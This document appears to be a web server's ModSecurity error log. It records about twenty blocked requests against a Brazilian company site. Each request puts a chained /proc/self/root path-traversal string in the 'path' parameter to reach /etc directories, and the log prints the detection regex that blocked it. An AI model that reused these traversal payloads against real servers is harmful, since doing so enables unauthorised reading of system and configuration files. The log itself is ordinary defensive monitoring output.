[Mon Mar 16 14:53:06.949753 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:48434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDgv9ocpUE4ed4uDz7OQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:08.299989 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:48444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDhKTCbgAP5jq5Teg4CwAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:09.674816 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.243.203:48460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDhVajLEzk2WiQ-10deAAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:11.011543 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:46476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDh3jZBu2q05ozVU9lsAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:14.919742 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:46488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDitSswJuvopo3lOhqIwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:16.294995 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:46494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDjNSswJuvopo3lOhqJQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:17.701700 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.243.203:46502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDjaQpVkWug9HeOt9BzwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:18.923661 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:46512] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDjqTCbgAP5jq5Teg4DQAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:20.136408 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:47462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDkNSswJuvopo3lOhqKAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:21.463547 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:47466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDkXjZBu2q05ozVU9luAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:22.915053 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.243.203:47482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDkqQpVkWug9HeOt9B1AAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:25.255593 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:47486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDlXjZBu2q05ozVU9luwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:53:30.860119 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:47502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDmaTCbgAP5jq5Teg4FwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:34.735427 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.241.46:45704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDnpqj1wV0Si-Okef6pgAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:53:35.772846 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.243.203:42014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDn7ysWC90G-1nBrBQIAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:53:40.715631 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:42024] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDpLABkC4fWIHEf8H7TgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:53:48.091865 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:43082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDqrysWC90G-1nBrBQJwAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:53:49.318785 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:38522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDrdSswJuvopo3lOhqOgAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:53:50.971319 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.241.46:55696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDrnjZBu2q05ozVU9lxAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:53:52.251190 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:55698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDsKQpVkWug9HeOt9B2gAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:53:55.385131 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:43084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDso6lpbStxTqkSkt3hwAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
